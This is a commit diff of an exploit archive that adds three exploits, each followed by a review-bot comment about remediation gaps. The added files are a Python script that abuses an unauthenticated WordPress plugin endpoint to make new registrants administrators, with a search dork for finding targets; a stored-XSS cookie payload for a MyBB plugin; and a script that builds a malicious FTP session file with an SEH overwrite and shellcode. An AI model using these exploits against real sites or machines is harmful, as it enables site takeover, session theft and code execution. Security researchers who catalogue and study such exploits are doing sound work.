Updated 09_07_2014
parent
bdd1b1c20a
commit
fe6788f41b
4 changed files with 113 additions and 0 deletions
|
@ -31104,3 +31104,6 @@ id,file,description,date,author,platform,type,port
|
|||
34534,platforms/php/webapps/34534.txt,"TCMS Multiple Input Validation Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
|
||||
34535,platforms/php/webapps/34535.txt,"Valarsoft WebMatic 3.0.5 Multiple HTML Injection Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
|
||||
34536,platforms/php/webapps/34536.txt,"CompuCMS Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
|
||||
34538,platforms/php/webapps/34538.txt,"Wordpress Plugins Premium Gallery Manager Unauthenticated Configuration Access Vulnerability",2014-09-05,Hannaichi,php,webapps,80
|
||||
34539,platforms/php/webapps/34539.txt,"MyBB User Social Networks Plugin 1.2 - Stored XSS",2014-09-05,"Fikri Fadzil",php,webapps,80
|
||||
34540,platforms/windows/dos/34540.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit",2014-09-05,"Robert Kugler",windows,dos,0
|
||||
|
|
Can't render this file because it is too large.
|
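--- a/platforms/php/webapps/34538.txt
+++ b/platforms/php/webapps/34538.txt
@@ -0,0 +1,43 @@
+#Exploit Title : Wordpress Plugins Premium Gallery Manager Unauthenticated Configuration Access Vulnerability
+#Author : Hannaichi [@dntkun]
+#Date : February 5th, 2014
+#Type : php, html, htm, asp, etc.
+#Category : Web Applications
+#Vulnerability : Unauthenticated Configuration Access
+#Tested On : Windows 7 32-bit | Google Chrome
+
+#Dork : inurl:/wp-content/plugins/premium_gallery_manager/ | USE YOUR BRAIN =))
+
+#Exploit : http://victim/[PATH]/wp-content/plugins/Premium_Gallery_Manager/hades_framework/option_panel/ajax.php
+
+#POC :
+Save File As Python (.py) =
+import httplib, urllib
+
+#target site
+site = "victim" #<--- no http:// or https://
+#path to ajax.php
+url = "/wp-content/plugins/Premium_Gallery_Manager/hades_framework/option_panel/ajax.php"
+
+def ChangeOption(site, url, option_name, option_value):
+params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})
+headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
+conn = httplib.HTTPConnection(site)
+conn.request("POST", url, params, headers)
+response = conn.getresponse()
+print response.status, response.reason
+data = response.read()
+print data
+conn.close()
+
+ChangeOption(site, url, "admin_email", "youremail@test.com")
+ChangeOption(site, url, "users_can_register", "1")
+ChangeOption(site, url, "default_role", "administrator")
+print "Now register a new user, they are an administrator by default!"
+
+
+#Place It Broo No Lazy For This :D !!
+
+--------------------------------------------------------------------------------------------------------------------
+
+Thanks to: #AnonSec Hackers - Borneo Security - Bekantan Crew - Indonesian Hacker - Muslim Hacker - You :*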
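Review bot: The advisory gives no affected version, no fix, and no way to check a site for earlier tampering, and its header date (`February 5th, 2014`) disagrees with the 2014-09-05 date in the index row. Because the PoC rewrites `admin_email`, `users_can_register` and `default_role` through an unauthenticated POST to `hades_framework/option_panel/ajax.php`, a remediation section should tell operators to remove or block web access to that file and to audit those three options together with recently created administrator accounts. The dork spells the directory `premium_gallery_manager` while the exploit path uses `Premium_Gallery_Manager`; the case should be made consistent so that defenders match the right path in access logs. The body of `ChangeOption` has no indentation as shown here, which may be a rendering artifact rather than a defect in the file.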
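--- a/platforms/php/webapps/34539.txt
+++ b/platforms/php/webapps/34539.txt
@@ -0,0 +1,30 @@
+# Exploit Title: User Social Networks MyBB Plugin 1.2 - Cross Site Scripting
+# Google Dork: N/A
+# Date: 05.09.2014
+# Exploit Author: Fikri Fadzil - fikri.fadzil@impact-alliance.org
+# Vendor Homepage - N/A
+# Software Link: http://mods.mybb.com/view/user-social-networks
+# Version: 1.2
+# Tested on: PHP
+
+
+Description:
+This plugin allows you to add social networks, or related, in user
+profiles. The information will be shown in a user profile and visible for
+anyone who view the profile.
+
+Proof of Concept
+1. Login into your account.
+2. Go to "Edit Profile" page at "/usercp.php?action=profile"
+3. Update your Social Network ID with
+"><script>alert(document.cookie)</script><"
+4. The result can be seen in multiple places, including your profile page.
+
+* The script will be executed whenever anyone view your profile.
+** The result can also be seen in threads you involve IF the administrator
+configure this plugin to allow user's social sites information to be
+published in every post.
+
+Solution:
+Replace the content of "inc/plugins/usersocial.php" with this fix:
+http://pastebin.com/T1WgcwDB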
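Review bot: The Solution section replaces the whole of `inc/plugins/usersocial.php` with an off-site paste and never says what the fix is, so the replacement cannot be reviewed and the advisory loses its remediation if the link disappears. It should state that the Social Network ID has to be HTML-escaped wherever it is output (the profile page and, when the administrator enables it, every post), presumably with MyBB's `htmlspecialchars_uni()`, and name the fixed plugin version if one exists. `Tested on: PHP` does not identify the MyBB or PHP version the finding was confirmed on.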
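--- a/platforms/windows/dos/34540.py
+++ b/platforms/windows/dos/34540.py
@@ -0,0 +1,37 @@
+# !/usr/bin/python
+#-----------------------------------------------------------------------------#
+# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit #
+# Date: Sep 05 2014 #
+# Vulnerability Discovery: Gabor Seljan #
+# Exploit Author: Robert Kugler #
+# Software Link: http://www.bpftp.com/ #
+# Version: 2010.75.0.76 #
+# Tested on: Windows XP #
+# CVE: CVE-2014-2973 #
+# #
+# Thanks to corelanc0d3r for his awesome tutorials and help! ;-) #
+# The "Enter URL" form is also vulnerable #
+#-----------------------------------------------------------------------------#
+
+buffer = "This is a BulletProof FTP Client Session-File and should not be modified directly.\n"
+buffer+= "\x20" + "\x90" * 89
+buffer+= "\xeb\x06\x90\x90"
+buffer+= "\xA0\xB3\x3C\x77" # shell32.dll pop pop ret @773CB3A0
+buffer+= "\x90" * 119 # 160 characters space
+buffer+= ("\x33\xc0\x50\x68"
+"\x2E\x65\x78\x65"
+"\x68\x63\x61\x6C"
+"\x63\x8B\xC4\x6A" # 36 bytes
+"\x01\x50\xBB\x35" # ExitProcess is located at 0x77e598fd in kernel32.dll
+"\xfd\xe4\x77\xFF"
+"\xD3\x33\xc0\x50"
+"\xc7\xc0\x8f\x4a"
+"\xe5\x77\xff\xe0")
+
+buffer+= "\x90" * (1000 - len(buffer))
+
+# Just load the "BP Session" and click on "Connect".
+
+file = open("ftpsession.bps","w")
+file.write(buffer)
+file.close()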
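Review bot: The file is indexed under `platforms/windows/dos/` with type `dos`, but its title and the SEH-overwrite layout describe a code-execution proof of concept for CVE-2014-2973, so triage based on the index row would understate the impact. The header should also say that the hard-coded module addresses are tied to the tested Windows XP build, e.g. `# NOTE: addresses are specific to the tested Windows XP build; a failed run does not show a host is unaffected`, and name the fixed client version if one exists. `buffer` and `file` shadow Python 2 builtins, and `# !/usr/bin/python` is not a valid shebang because of the space after `#`.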